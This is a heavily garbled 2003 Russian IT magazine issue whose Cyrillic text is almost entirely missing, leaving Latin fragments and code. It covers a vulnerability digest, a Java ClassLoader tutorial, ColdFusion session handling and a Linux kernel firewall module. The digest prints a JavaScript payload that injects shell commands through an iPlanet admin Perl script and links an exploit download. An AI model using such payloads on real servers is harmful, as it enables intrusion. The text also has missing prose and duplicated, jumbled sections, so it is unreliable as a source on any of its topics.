, .
,
: ? ?

. 745- . ,
. .
, ,
. ,
. , . , ,
, .
, ,
.

, .
,
.
.
,
,
.
. . ,
? , ?
,
262.
, . 1999-.


1997-, .. . 3-4 -. 90%.
, .
.
.
. -,

, . -, , - . - ? -, .
,
. ,
- .

. ,
.
, ,

.

, , ,
60
. . , , . , . : ,
,
. :
!.
,

, , ?
, . , (
).
. .
.
.

57

bugtraq
MDAC (Internet
Explorer, Interner Information Server)
Microsoft Data Access Components (MDAC) , Windows-. MDAC , Windows-:
! Windows XP,
Windows 2000 Windows Millennium.
! .
! (, Windows NT 4.0, Option Pack
Internet Explorer).
MDAC ,
. MDAC-, Remote Data Services(RDS),
,
, ,
, . RDS-, RDS Data Stub, HTTP- RDS-.
Data
Stub. HTTP-
Data Stub,
.
, , Microsoft
,
.
-, :
! - , MDAC
. -
HTTP-, . IIS ( , LocalSystem).
! - , RDS Data
Stub Internet Explorer
, . - HTML .
Microsoft,
, , . - MDAC / RDS,
MDAC 2.7, . -
,
RDS. ,
- MDAC, -
.
Microsoft Data Access
Components (MDAC) 2.1 Microsoft Data Access Components

58

(MDAC) 2.5, Microsoft Data Access Components (MDAC) 2.6,


Microsoft Internet Explorer 5.01, Microsoft Internet Explorer
5.5, Microsoft Internet Explorer 6.0.


iPlanet Web Server

root-, iPlanet Web Server 4.* up to SP11 (NG-XSS).
:
! open() Admin Server PERL .
! .
iPlanet Web Server,
Perl- .
- .

, Perl.
, Perl . ,

. javascript :
<script>
window.location="/https-admserv/bin/perl/
importInfo?dir=|<command>%00";
</script>


Macromedia Flash
SWRemote , Macromedia Flash.
shellcode,
.
Macromedia Flash 6.0.47.
: http://
www.securitylab.ru/_tools/swfexpl.zip.

Samba

Samba. -
,
.
,
pam_smbpass PAM. , root .
Samba 2.2.2-2.2.6.


SITEMETA

, <META>
, , ,
.
,
.

.
.
.
.
.

. 0.001 1000 . .
. (HTML, XML, DOC, XLS, . .)


60


,
, , , -
, , ,
, , siteMETA, .

?
-
, . , ,
, .
:
. . , -
, ,
... , ,
. , ?
Web-usability
: . -, -
, -, . : ,
. .
.
-,
, . , ,
.
, ? , , , .
, ,
,
( ) .

?
, ,
.
. ,
,
. . -

1(2), 2003

,
,
. ,

, .
,
, .

, ,
. , , ,
,
.
, , , . , , , , , , ,

. , . ,
!

.
, () ,
, .
,
, .

,
.

, , .

COM UNIX? !
COM. , Component Object Model
( UNIX, ,
)
Microsoft Windows, Linux
FreeBSD, ,

61


.
,
.
BerkeleyDB, .
libgist, . , , ,
,
libgist , ,
b-tree, . ,
,
, ,
.

, ...
. ,
, :
! ;
! ;
! ,
, ;
! , .
,
, , .

... ?
, b-tree,
, , , .
( ), - .
, .

62


. ,

, , .
,
,
, . ,
!
,
, .

...
,
: , .
-. siteMETA ,
. , .
, . . .
- - . .
; , , .
. , , ,
.



.
. ,
, -, , , ,
wildcard- . . CGI-, , - , -


, , . .
, -, .
, ,
.

(www.bank.gov.ua). ,
html Microsoft Excel (.xls)
( ) .
50 .

web- ...
. , , , , -
,
HTML.
?

siteMETA, html-, , Microsoft Word, Microsoft Excel
.
.doc, .xls, .rtf .xml. , , , -.

, ,
. , siteMETA, log-. , ,
,
, . ., . ,
,
. ,

,
. , , : -
,

.
, ,
. , , ,
.
!

!
.
. .

, -

1(2), 2003


(http://www.zerkalonedeli.com/). ,
, . ,
, , ; . 800 .

siteMETA, . , .
, ,
, , -.
siteMETA
http://sitemeta.com.

63

JAVA:

II. ClassLoader




java.lang.ClassLoader.
.
Java . , , Java,
. , Java,
Java-, Java. , .
, ClassLoader Java. ,
,
ClassLoader . ,
- .class-, ,

ClassLoader.

ClassLoader . Java :
java __

JAR-, CLASSPATH (
-cp java),
JAR-,
java.lang.String Java.
Java , ClassLoader
.
Java-. Java-,
, , Web- , .
ClassLoader,
Java-. , , , CLASSPATH, Internet.
, .
-
, ,
.class-. .
,
, -. -

1(2), 2003

: c , Internet,
- , ClassLoader - ( .class-) byte[].

ClassLoader.defineClass, Class.

.class-
Java-. ,
, , Java. Java- Java,
,
ClassLoader.

Java
ClassLoader .
, ,
Java .
,
ClassLoader
. ClassLoader.getSystemClassLoader() ClassLoader, :
public static ClassLoader getSystemClassLoader()

Java :
java __

Java , .class- , :
public static void main(String[] argv)

( , ).
Java . , java1.
-
( : ,
),
. ,
. ,
. ( .)
. ?
Java -

65


. ( ClassLoader), , .
. , , , getClassLoader:

initialize true, ,
, .
Class.forName, (,
1, 2002.)

public ClassLoader getClassLoader()


public static Class forName(String className)

Class, .
,
MyClass, MyClass.class.getClassLoader()
, , ..
-, MyClass.class.getClassLoader().

, , Java- ,
.

. , , ,
, .
,
, . Java-
(
Web-);
.

. , . , , - . ,
, . , ,
,
, java.lang.String.
,
Class.forName:
public static Class forName(String name,
boolean initialize,
ClassLoader loader)

name ( ), loader .
( ) initialize , ..
static- :
static {
...
}

66

.
,
Class.forName(name)


Class.forName(name,true, _.class.getClassLoader())

_ , .
,
.
( .)
Java
loader ( - , loader - ). :
Class clazz= Class.forName("_",true,
__);
clazz.newInstance(); //

_ (Thread),
. , ,
.

ClassLoader
ClassLoader , .
, .
Sun.
ClassLoader .
, .
???????????????????????????????????????????


public Class loadClass(String name)

.
protected-:


protected synchronized Class loadClass(String name,
boolean resolve)

, protected .
, loadClass(String name) public.
,
Class.forName("_",true,loader)

( Class ClassLoader
loadClass(String name)
protected.
Class.forName .)
, loadClass public-,
Class.forName(_,true,loader) loader.loadClass(_) ?
,
Class.forName.
. ,
Class.forName , , , , loadClass,

loader.
, :
public URL getResource(String name)
public InputStream getResourceAsStream(String name)
public final Enumeration getResources(String name)
public static URL getSystemResource(String name)
public static InputStream getSystemResourceAsStream(
String name)
public static Enumeration getSystemResources(String name)

getResource
getResourceAsStream Class,
.
Class.getResource Class.getResourceAsStream
, .
ClassLoader . , class- (
Class.getResource Class.getResourceAsStream),
,
CLASSPATH.

getSystemResource, getSystemResourceAsStream,
getSystemResources , - .
System ,
.
, .
ClassLoader .

:


ClassLoader.
Java
ClassLoader .class - , , , CLASSPATH.
, , ,
. .class , CLASSPATH,
.
Internet ,
,
.
.
,
Java. - :
. , , ,
.
, ,
.
. ,
. ,
, ( , ).
,
.
.

.
Class.forName(name) (, CLASSPATH
.class-), ,
.
.class- . ,

.
.class-

. , , (.. Java), - , .
-
, : -

1(2), 2003
64-77.p65

67
67

18.12.02, 19:24


. ( ClassLoader), , .
. , , , getClassLoader:

initialize true, ,
, .
Class.forName, (,
1, 2002.)

public ClassLoader getClassLoader()


public static Class forName(String className)

Class, .
,
MyClass, MyClass.class.getClassLoader()
, , ..
-, MyClass.class.getClassLoader().

, , Java- ,
.

. , , ,
, .
,
, . Java-
(
Web-);
.

. , . , , - . ,
, . , ,
,
, java.lang.String.
,
Class.forName:
public static Class forName(String name,
boolean initialize,
ClassLoader loader)

.
,
Class.forName(name)


Class.forName(name,true, _.class.getClassLoader())

_ , .
,
.
( .)
Java
loader ( - , loader - ). :
Class clazz= Class.forName("_",true,
__);
clazz.newInstance(); //

_ (Thread),
. , ,
.

ClassLoader
ClassLoader , .
, .
Sun.
ClassLoader .
, .
public static ClassLoader getSystemClassLoader()

name ( ), loader .
( ) initialize , ..
static- :
static {
...
}

66


public Class loadClass(String name)

.
protected-:


defineClass:

return findSystemClass(name);
// .
// findSystemClass -
// ClassLoader
// protected final Class findSystemClass(String name)
// (..
// ).
//
// .
// "findSystemClass(name)"
//
//
// java.lang.String,
// JAR-
// ( JAR)
}
try {
byte[] classBytes= loadFileAsBytes(f);
result= defineClass(name,
classBytes,0,classBytes.length);
} catch (IOException e) {
throw new ClassNotFoundException(
"Cannot load class "+name+": "+e);
} catch (ClassFormatError e) {
throw new ClassNotFoundException(
"Format of class file incorrect for class "
+name+": "+e);
}
classesHash.put(name,result);
return result;

protected final Class defineClass(String name,


byte[] b, int off, int len)
throws ClassFormatError

, .class- ( b len off) . defineClass, , native-. - ,


, ,
,
( Just-In-Time, JIT-).
, findResource
, ,
findClass URL.

,
loadClass Class . , , :
?
private- java.util.HashMap DynamicClassOverloader. ,
,
.
, : .

}
protected java.net.URL findResource(String name) {
File f= findFile(name,"");
if (f==null) return null;
try {
return f.toURL();
} catch(java.net.MalformedURLException e) {
return null;
}
}
private File findFile(String name, String extension) {
// name , ,
// extension ,
// classPath. name
// '/'
// .
// (
// findResource.)
for (int k=0; k<classPath.length; k++) {
File f= new File((new File(classPath[k])).getPath()
+File.separatorChar
+name.replace('/',File.separatorChar)+extension);
if (f.exists()) return f;
}
return null;
}

import java.io.*;
public class DynamicClassOverloader extends ClassLoader {
private java.util.Map classesHash= new java.util.HashMap();
public final String[] classPath;
public DynamicClassOverloader(String[] classPath) {
// - CLASSPATH
this.classPath= classPath;
}
protected synchronized Class loadClass(String name,
boolean resolve)
throws ClassNotFoundException
{
Class result= findClass(name);
if (resolve) resolveClass(result);
return result;
}
protected Class findClass(String name)
throws ClassNotFoundException
{
Class result= (Class)classesHash.get(name);
if (result!=null) {
/*
System.out.println("% Class "+name
+" found in cache");
/*
return result;
}
File f= findFile(name.replace('.','/'),".class");
// mypackage.MyClass
// mypackage/MyClass.class
/*
System.out.println("% Class "+name
+(f==null?"":" found in "+f));
/*
if (f==null) {

1(2), 2003

public static byte[] loadFileAsBytes(File file)


throws IOException
{
byte[] result= new byte[(int)file.length()];
FileInputStream f= new FileInputStream(file);
try {
f.read(result,0,result.length);
} finally {
try {
f.close();
} catch (Exception e) {
// ,
// close.
// - .
// ,
// ,
// read.
};
}
return result;
}

. TestModule.java,
:
public class TestModule {

69

public String toString() {


return "TestModule, version 1!";
}

Test.java, :
import java.io.*;
public class Test {
public static void main(String[] argv) throws Exception {
for (;;) {
ClassLoader loader= new DynamicClassOverloader(
new String[] {"."});
// - "."
//
Class clazz= Class.forName("TestModule",
true,loader);
Object object= clazz.newInstance();
System.out.println(object);
new BufferedReader(new InputStreamReader(
System.in)).readLine();
}
}
}

,
Test:
java Test

loader, TestModule, , , , toString(), TestModule.


ENTER (
Ctrl-C ).
ENTER, ( Windows) ( Unix), -
TestModule: toString()
TestModule, version 2! . ENTER.
! TestModule.class TestModule, version 2!.
, , class-, .
TestModule
,
. ,
,
.


,
? , , ,
- , ,
object.toString(). - java-
java _

. ,

70

Java-, .
-
, , ,
.
,
,
. ,
, ,
. .
,
,
Class.forName("_",true,loader)

,
, , ,

Java. , , , ,
.
, .
newInstance() Object.
, TestModule,

:
...
Class clazz= Class.forName("TestModule",true,loader);
TestModule testModule= (TestModule)clazz.newInstance();
testModule, ..

Class.forName(TestModule), .
. forName
TestModule ( ,
TestModule), . .

.
ClassCastException !

,
, .
. , , - . , , -


LinkageError.
. ,
Java.
- , Java, , .
.
. , Java
static , . () .
DynamicClassOverloader, class-, .
: , -,

DynamicClassOverloader (, ) .
Java
, .
, Java ,
, .
, , , , .
, Java, TestModule,
TestModule
testModule= ... Test.java,
TestModule,
Class.forName("TestModule",true,loader)

. (
Test),
DynamicClassOverloader. -
.
, , , TestModule, . . TestModule:
public class TestModule {
private static int counter= 0;
public String toString() {
return "TestModule, version 1! "+(counter++);
}
}

1(2), 2003

toString()
, 1
counter. Test.java
Class.forName(TestModule), :
.
.
DynamicClassOverloader
,
TestModule,
.
, Java
. ,
, ,

,
.
, , .
?
, ,
DynamicClassOverloader, , Test.

, .. ,
findSystemClass(name). - truestatic. true-static-
. truestatic-
, Java,
. , ,
true-static ,
, , , , . .
, true-static- java.lang,
. ,
Object String. TestModule
String toString().
, true-static-. ,

static- , 2.
( ) :
, name truestatic .
,
DynamicClassOverloader: findClass

71


File f= findFile(name.replace('.','/'),".class");

name. findClass:
protected Class findClass(String name)
throws ClassNotFoundException
{
Class result= (Class)classesHash.get(name);
if (result!=null) {
/*
System.out.println("% Class "
+name+" found in cache");
/*
return result;
}
if (name.toLowerCase().indexOf("truestatic")!=-1)
return findSystemClass(name);
File f= findFile(name.replace('.','/'),".class");
...

. truestatic- TrueStaticModule.java:
public class TrueStaticModule {
protected static int counter= 0;
public int getCounter() {
return counter;
}
}

public- getCounter(), .

DynamicModule.java:
public class DynamicModule extends TrueStaticModule {
public String toString() {
return "DynamicModule, version 1! "+(counter++);
}
}

, Test.java :
import java.io.*;
public class Test {
public static void main(String[] argv) throws Exception {
for (;;) {
ClassLoader loader= new DynamicClassOverloader(
new String[] {"."});
// - "."
//
Class clazz= Class.forName("DynamicModule",
true,loader);
TrueStaticModule trueStaticModule=
(TrueStaticModule) clazz.newInstance();
System.out.println(trueStaticModule.getCounter());
System.out.println(trueStaticModule);
new BufferedReader(new InputStreamReader (
System.in)).readLine();
}
}
}

:
java Test

.
DynamicModule,

72

.
toString() true-static-
TrueStaticModule.
ClassCastException, counter .
.
, true-static- forName,
forName.
, forName , , private-,
forName.
. ,
invalidate, private-
forName
.
invalidate Java- ,
. ,
.

Java . : . ,
true-static. .
, ,
, Java.
Java- ,
DynamicClassOverloader, ,
, DynamicClassOverloader.
,
, DynamicClassOverloader. , ,
true-static-.
A. , true-static-
, : ,
, . , -


Java.

Class.forName("TestModule",true,loader)

true-static- ( ), , . , (
) true-static-, ,
true-static-,
true-static- . .
- . ,
,
. , , , -
true-static- , ,
- static- truestatic-.
, , .

TestModule.
, ,

true-static-
TrueStaticModule .
, . , .. . , ,
, ,
, ,
.
, , , true-static.
. - , , , ,
.
A .
A1.
( , true-static-)
- , . , ,

, -

1(2), 2003

, , DynamicClassOverloader.
A2. true-static-,
, , true-static-, ,
, true-static-.
public-, . ( true-static- ,
java.lang.String java.io.File,
.)
A3. - , , ,
catch (_ e)

,
_ true-static.
:
B. ,
. : , ,
, .
:
B1. ,
. .
,
Java-. public-, ,
public static boolean debugMode= false;

.
.
Java-

.
. static- , . , DynamicClassOverloader, , static-.
, ,
true-static. :
public class __ {

73

public static class TrueStaticSection {


public static boolean debugMode= false;

}
...

B2.
, ,
true-static-,
true-static- public,
true-static-
java-. :
true-static, ,
, protected- true-static.
, true-static-, , , private .
,
Java-, , , ,
.
private- .
: ()
Java
.
, .
C. native - ,
System.loadLibrary
, true-static.
Java, , Windows. Java loadLibrary
.
.
System.loadLibrary :
static {
System.loadLibrary("__");
}


:
.


? ,
.
, -

74

: .
, ,
:
. ,
, , , ,
C, . , C, ,
.
, , Java.

:
loadClass forName
DynamicClassOverloader.

System.out.println, .
, .
Java, , ,
Class result= (Class)classesHash.get(name);
if (result!=null) {
...

!

: , Class.forName
, ,
. . , loadClass, loadClass findClass . , Java- .
Class.forName. , ,
- .

DynamicClassOverloader, .
, Java-. ClassLoader
protected-
findLoadedClass , -


. null.

, . , ,

Class.forName("_",true,loader)


loader.loadClass("_")

loadClass
. (
Class.forName , ,
loader name , forName loadClass findClass.)
, , ..
defineClass.

loader.loadClass("_")
loader.loadClass("_")

LinkageError! , .. defineClass.
Class.forName("_",true,loader)

,
.
, , , , ,
loader.loadClass("_")


Class.forName("_",true,loader)

Class.forName("_",false,loader)

DynamicClassOverloader .

,
DynamicClassOverloader invalidate:
public void invalidate() {
classesHash.clear();
}

classesHash?

1(2), 2003

: ?
.
Class.forName("_",true,loader)

invalidate, classesHash,
.
, loader .

loader.loadClass("_")

invalidate,
,
LinkageError.

DynamicClassOverloader
, DynamicClassOverloader

.
: . -verbose:class java
, .
. DynamicClassOverloader :
,
,
. .
DynamicClassOverloader , CLASSPATH. , .
, , , Java-: Web-
Microsoft Word. , . , ,
,
CLASSPATH .
, ,
, . Java-
, Internet,
Web- . Java ,

75


. ( . , .. package.) , , , .

DynamicClassOverloader, .
.

, Java
Java-. , .
.
, -

, Java , , .
Java , Java-
Java.
, Java-
.class-. , , ,
Java Java-.
1

. ,
,
,
. -

,7$OOLDQFH
IT-
21 2002 IT : InPrice, Zero Studio Positive
Technologies , - .
IT Alliance. .
, , -, .

.
- , , .
, , , .
- .
, IT
Alliance. , , , , :
InPrice , Zero Studio web, , Positive Technologies
web- .
,
, , IT Alliance
.
, .
-,
2003 .

76


, java -verbose:class.
2
,
. ,
Class
result= defineClass(name,classBytes,0,classBytes.length)

, , , TrueStatic.
TrueStatic.class.isAssignableFrom(result)

TrueStatic result,
, .
,
result, result.getInterfaces()
.

IT Alliance:
Zero Studio - . 1998
100 , , , . . Zero Studio , -
, Data Cable&Wireless,
.
InPrice
InPrice , , 1996. InPrice
ZIV, Minds@Work , - IOI Technology Corporation
Taiwan, Compaq, PC, OEM Fujitsu,
USBnet, Inc. InPrice ,
, .
IDS (InPrice Data Systems) - , InPrice. , ,
. IDS
InPrice . 2002 . IDS
.

Positive Technologies ,
(.. ). Positive Technologies XSpider,
.

.
3RVLWLYH
7 H F K Q R O R J L H V

IT,
.

1(2), 2003

77


COLDFUSION,


.
- , ,
- ,
,

. , web- .
, web-
,
? ,
. ,

78

:
? .
: !
.
,
(ColdFusion, ,

, 1, 2002.) ColdFusion
.
ColdFusion.
(
setMyName.cfm) : myName, -


sayHi.cfm:
<cfset myName="Alexander Mejenkov">
<cflocation url="sayHi.cfm">

<cflocation> sayHi.cfm,
.
sayHi.cfm :
<cfoutput>
Well, hello there, #myName#
</cfoutput>


setMyName.cfm. , -


: Error resolving
parameter MYNAME. ,
web-, ColdFusion

,
!
,
web-,
ColdFusion, HTTP-.
, ,
, ,
. , web,
HTTP-,
,
. HTTP


,
.
ColdFusion-, myName
, .
,
HTTP,
ColdFusion,
.

Application
framework



ColdFusion

application framework () , ().


ColdFusion () , .
Application.cfm.

Session-
Client-
Session- -

1(2), 2003

( ) .
Session-

ColdFusion .

,
, . Session-
.
Session. ,
Session- , .
Client-

Session , ,

. . Client- cookies
(,

cookies), Windows .
Client- Session- ,
Application.cfm, ( )

. ,


A.
UNIX-.
,
,
, .
Session-,
Client- ColdFusion CFID
CFTOKEN. CFID
, CFTOKEN .
CFID=3
CFTOKEN=54579676. CFID
CFTOKEN Session-. -

cookies
. ColdFusion-, CFID CFTOKEN,
cookies, . ColdFusion
, .
,
/ .
,
cookies , , URL-
FORM-. ,
<cflocation>
ADDTOKEN =
Yes.
Session- / Client- <cfapplication>,
Application.cfm.
c
<cfapplication>:
<cfapplication name = "application_name"
clientManagement = "Yes" or "No"
clientStorage = "datasource_name"
or "Registry" or "Cookie"
setClientCookies = "Yes" or "No"
sessionManagement = "Yes" or "No"
sessionTimeout =
#CreateTimeSpan(days, hours,
minutes, seconds)#
applicationTimeout =
#CreateTimeSpan(days, hours, minutes,
seconds)#
setDomainCookies = "Yes" or "No">

! name ;
! clientManagement -

. Client-. No;
clientStorage
. Client-.
;
setClientCookies
. Yes cookies
.
Yes. No,
ColdFusion CFID
CFTOKEN cookies .

CFID CFTOKEN URL
,

79


Session- Client-;
! sessionManagement
. Yes Session. No;
! sessionTimeout
. Session-
date/time, CreateTimeSpan().
: , ,
,
.
Variables ColdFusion Administrator;
! applicationTimeout .
Application- (
) date/time,
CreateTimeSpan(). : , , , . Variables
ColdFusion Administrator;
! setDomainCookies
. CFID
CFTOKEN cookies , .
No.

Yes , .

<cfapplication>
:
<cfapplication
name="myBestApplication"
ClientManagement="No"
SessionManagement="Yes"
SessionTimeout=#CreateTimeSpan(0,0,1,0)#
SetClientCookies="Yes">

Session- . , cookies
. ,
<cfapplication>
cookies 1 . 1 ,

80

,
.
:
<cfif IsDefined("Cookie.CFID") AND
IsDefined("Cookie.CFTOKEN")>
<cfset localCFID = Cookie.CFID>
<cfset localCFTOKEN = Cookie.CFTOKEN>
<cfcookie
name
=
"CFID"
value="#localCFID#">
<cfcookie name = "CFTOKEN"
value="#localCFTOKEN#">
</cfif>


CFID CFTOKEN cookies,
ColdFusion

Application.cfm, (), ,
EXPIRES. cookies ( MS
IE) , .

( )
cookies
, . ,

, cookies ,
,
.


Session-
Session- , Session-
, ,
, .
(
Session- ) , .
Session- , .
,
ColdFusion . ,
ColdFusion
, ,

,
. -

Session-,
application- server- . Allaire shared scope ( ).
?
ColdFusion ,

. ,

, (multi-threaded applications) . .

,
shared scope.
, ,
ColdFusion-
shared scope-,
.
ColdFusion- . ColdFusion, ,

. <cflock>.
:
! name
,

;
! scope
(shared scopes): session, application
server;
! timeout , ( , <cflock>
);
! throwontimeout (Yes/No), ,

-


timeout.

<cflock>-
<cftry><cfcatch>;
type readonly exclusive.
Readonly .

: -
, , , .
Readonly , shared scope
.
Readonly

Exclusive-. Exclusive
,
,
shared scope-.

Client-
Client- . ,
, Session-
,
lients- :
,
ColdFusion, ODBC
,
cookies .
Client-,
Session-,
CFID
CFTOKEN, Client .
Client-
,
.
.

ODBC , (, ), ColdFusion
native () ODBC ( Access), ColdFusion- ( check

1(2), 2003

box) Client-.

Client
: Client-
Session-, Session-. ,
Client- , Session-, .
:
Client- ,
( ,
).
WDDX-. (WDDX ).
. Session-
,
CreateTimeSpan (days, hours,
minutes, seconds), Client- .
ColdFusion-
,
,
(purge data for clients that
remain unvisited for n days).
Client-,
Session-, cookies CFID CFTOKEN,
cookies EXPIRED, Client .

, cookies

.

. cookies ,
,
.

Brian Kotek, ColdFusion CNET Builder.com


(http://builder.cnet.com/),
custom tag, ClientTimout.cfm, Client.
:
<CFPARAM NAME="CLIENT.CheckLastVisit
"DEFAULT="#CreateODBCDateTime(
Now())#">
<CFSET Compare = DateCompare
(DateAdd(n,(ATTRIBUTES.TimeOut * -1),
CreateODBCDateTime(Now())),
CLIENT.CheckLastVisit)>
<CFIF Compare IS NOT -1>
<CFSET CALLER.TimedOut = "Yes">
<CFELSE>
<CFSET CALLER.TimedOut = "No">
</CFIF>
<CFSET CLIENT.CheckLastVisit =
CreateODBCDateTime(Now())>



ColdFusion Application.cfm .
<cf_ClientTimeout timeout="15">

timeout ,
,
Client- .
?
Cookies
,

. , cookies
, ,
.
Session- ,
. , Session-

.
,

Client-.

81


,
,
,

,

, ,
.



?




.


1


:
! ;
! -;
! .

, -,
, .
.
IP log-.
. ,
, ( IP). , , . - ,
().

82

-, (
log-).

, IP-.
, .

IP
, ,
IP. ${KERNEL_SRC}/net/ipv4/ip_input.c,
${KERNEL_SRC} .

header-:
# ifdef CONFIG_SF_FIREWALL
# include <linux/sf_kernel.h>
# endif

ip_rcv.


.
:
# ifdef CONFIG_SF_FIREWALL
int err;
# endif

(ip_fast_csum) , :
# ifdef CONFIG_SF_FIREWALL
if ((err=sf_fw_chk(iph,dev,SF_STATE_RECEIVE))!=1)
{
kfree_skb(skb);
return 0;
}
# endif

sf_fw_chk.
. 1, skb, (. <linux/skbuff.h>), ,
.

sf_kernel.h
.
:
#define SF_RC_ACCEPT
1-
#define SF_RC_BLOCK
0-
#define SF_STATE_RECEIVE 0-
IP
extern int sf_fw_chk_pass(struct iphdr *, struct net_device
*, int);
extern int sf_fw_chk_block(struct iphdr *, struct net_device
*, int);
extern int (*sf_fw_chk)(struct iphdr *, struct net_device
*, int);

sf_fw_chk_pass , sf_fw_chk_block .
(*sf_fw_chk)
,
.
sf_stub.c.
sf_kernel.h ${KERNEL_SRC}/include/linux.

sf_stub.c
, ,
sf_fw_chk_pass, sf_fw_chk_block
(*sf_fw_chk). :

#ifdef CONFIG_SF_FIREWALL
int (*sf_fw_chk)(struct iphdr *ip, struct net_device
*rif, int opt) = sf_fw_chk_pass;

sf_fw_chk_pass :
int sf_fw_chk_pass(struct iphdr *ip, struct net_device *rif,
int opt)
{
return SF_RC_ACCEPT;
}

sf_fw_chk_block :
int sf_fw_chk_block(struct iphdr *ip, struct net_device *rif,
int opt)
{
return SF_RC_BLOCK;
}
#endif /* CONFIG_SF_FIREWALL */

:
! IP- (struct iphdr,
<linux/ip.h>);
! (struct
net_device, <linux/
netdevice.h>);
! IP (int
opt).
sf_stub.c ${KERNEL_SRC}/net/ipv4. Makefile, , obj-y sf_stub.o
ipv4.o.

ksyms.c

,
${KERNEL_SRC}/kernel/ksyms.c.
sf_kernel.h:
#ifdef CONFIG_SF_FIREWALL
#include <linux/sf_kernel.h>
#endif

:
#ifdef CONFIG_SF_FIREWALL
EXPORT_SYMBOL(sf_fw_chk_pass);
EXPORT_SYMBOL(sf_fw_chk_block);
EXPORT_SYMBOL(sf_fw_chk);
#endif

config.in
#include
#include
#include
#include
#include

<linux/config.h>
<linux/kernel.h>
<linux/netdevice.h>
<linux/ip.h>
<linux/sf_kernel.h>

, ,
(*sf_fw_chk) sf_fw_chk_pass,
:

1(2), 2003

${KERNEL_SRC}/arch/i386/config.in
GENERAL SETUP :
bool 'SF_FIREWALL SUPPORT' CONFIG_SF_FIREWALL

83



, GNU/Linux, Linux:
(http://www.programme.ru/archive/2001/8/
082001_1.phtml).
() . :

struct file_operations firewall_fops


(. <linux/fs.h>). , / .
, firewall_fops
:
struct file_operations firewall_fops = {
read:
read_firewall,
write:
write_firewall,
open:
open_firewall,
release:
close_firewall,
};

mknod /dev/firewall c 44 0



:
#include
#include
#include
#include
#include
#include
#include
#include
#include

<linux/module.h>
<linux/kernel.h>
<linux/slab.h>
<linux/fs.h>
<linux/netdevice.h>
<linux/types.h>
<linux/ip.h>
<linux/sf_kernel.h>
<asm/uaccess.h>


open(). :
static int open_firewall(struct inode *inode, struct file
*file)
{

, :
if(MOD_IN_USE) return -EBUSY;

, , :

#define FIREWALL_MAJOR 44 .
if (MINOR(inode->i_rdev) != 0) return -ENODEV;

log-:
struct data_log
{
__u32 addr;
int action;
int ready;
}
*sf_entry_log;

:
! addr IP- ;
! action (1 , 0
);
! ready .



init_module:

int init_module(void)
{
if
(register_chrdev (FIREWALL_MAJOR,"firewall",&firewall_fops))

printk("unable to get major %d for firewall


device\n", FIREWALL_MAJOR);
return -EIO;
}
return 0;
}

,
FIREWALL_MAJOR.


init_module

84

0. ,
.
, . /
:
if ((file->f_mode & 1) != 1) return -EBUSY;

:
sf_entry_log=(struct data_log *)kmalloc(sizeof(struct
data_log),GFP_ATOMIC);
iph=(struct
iphdr
*)kmalloc(sizeof(struct
iphdr),GFP_ATOMIC);


. GFP_ATOMIC
(GFP Get Free Page) ( GFP_KERNEL).
, . , (*sf_fw_chk)
sf_fw_chk_pass, . (*sf_fw_chk) sf_check_packet,
:
sf_fw_chk = sf_check_packet;


sf_check_packet .
:
sf_fw_enabled++;
sf_entry_log->ready=1;

MOD_INC_USE_COUNT;
return 0;


IP- ,
. :
static ssize_t write_firewall(struct file *file, const char
*buf, size_t count, loff_t *ppos)
{

:
count = sizeof(struct iphdr);
return count;
}


log-.
:
static ssize_t read_firewall(struct file *file, char *buf,
size_t count, loff_t *ppos)
{

struct data_log. :
if (count!=sizeof(struct data_log)) return -EINVAL;

:
, , . , .
, IP-. , , , .
. :
if(count!=sizeof(struct iphdr)) return -EINVAL;


. :
int (*sf_fw_chk_save)(struct iphdr *, struct net_device *,
int);

:
sf_fw_chk_save = sf_fw_chk;
sf_fw_chk = sf_fw_chk_block;

:
copy_from_user(iph,buf,sizeof(struct iphdr));

copy_from_user()
. <asm/
uaccess.h>.
:
sf_fw_chk = sf_fw_chk_save;

:
file->f_pos += count;

1(2), 2003

if (sf_fw_enabled<=0) return -ENODEV;


:
copy_to_user(buf,sf_entry_log,sizeof(struct data_log));

struct data_log
sf_check_packet().
:
file->f_pos += count;

.

sf_check_packet() :
sf_entry_log->ready = 0;

:
count = sizeof(struct data_log);
return count;
}

sf_check_packet
, struct data_log
log-.
:
int sf_check_packet(struct iphdr *ip, struct net_device *rif,
int opt)
{

85


.
addr sf_entry_log IP- :


:
sf_fw_chk = sf_fw_chk_pass;

sf_entry_log->addr = ip->saddr;

:
:
if (ip->saddr == iph->saddr) {
sf_entry_log->action = SF_RC_BLOCK;
sf_entry_log->ready = 1;
return SF_RC_BLOCK;
}

IP- , , IP , .
, :

sf_entry_log->ready = 1;
sf_entry_log->action = SF_RC_ACCEPT;
return SF_RC_ACCEPT;


:
static int close_firewall(struct inode *inode, struct file
*file)
{

:
sf_fw_enabled;

:
sf_fw_chk = sf_fw_chk_block;

unregister_chrdev(FIREWALL_MAJOR,"firewall");
return;
}

Makefile
Makefile
:
include make.options
#
CC = gcc
#
module = sf_device.o
#
CFLAGS = -O2 -Wall -fomit-frame-pointer
MODFLAGS = -D__KERNEL__ -DMODULE -I$(LINUX)/include
sf_device.o: sf_device.c
$(CC) -c $(CFLAGS) $(MODFLAGS) sf_device.c

:
! O2 - ;
! Wall (warning all);
! fomit-frame-pointer
(frame pointer) , .
, (frame pointer),
.

:
make.options:
kfree(sf_entry_log);
kfree(iph);

:
MOD_DEC_USE_COUNT;
return 0;
}

#
LINUX = /usr/src/linux


make. sf_device.o. insmod:


cleanup
_module:

insmod sf_device.o

rmmod:
void cleanup_module(void)
{

, -
:
if(MOD_IN_USE)
{
printk("firewall: busy - remove delayed\n");
return;
}

86

rmmod sf_device


.

GNU/Linux, Slackware 7.1, 2.4.17, gcc-2.95.2.


,
.
, ,
- . ,
.
: , ,
,

.
,
. ,
.

88

.

,

.
,

,

,
.
.
, , . GNU/Linux . , -

, ,
, . ,
,
, , , .

,
,
, .
, Linux ,
,
UNIX,
-


. ,
?

,

. , ,
. , ,
.

1
()
,
,
.
,
. ,

,
, , , ,
,
,
. , , , -

, . ,
,
, ,
.
,
GPL , ,

, -
,

.

1(2), 2003

,
.
, .

, , , ,
, , ,
. , , , 70 Windows XP

- . ,

,
, , www.treasury.ru/~vampiro/
hohma.html.

( , )

. ,
, , .
,
,
,
. Linux
.
, , ,
-,
. ,

. .
, GPL ,
. ,
- ,
, (
, ).

. ,
, ,
Linux ,
.
,
Linux .

2
()
- . Windows 98 ,
,
. , , ,


,
, .
, .
Linux

,
, . , ,

. ,

89


, Linux .
.
, Linux,
(
) , . ,
GPL , .


.
,
.

3
()
,
, . ,
,
ASPLinux
ALTLinux,

Windows 98.
, , .
, ,
.
Linux
. , Windows, ,
(
,

90

, ), Linux .
,

,
50% ,
Debian
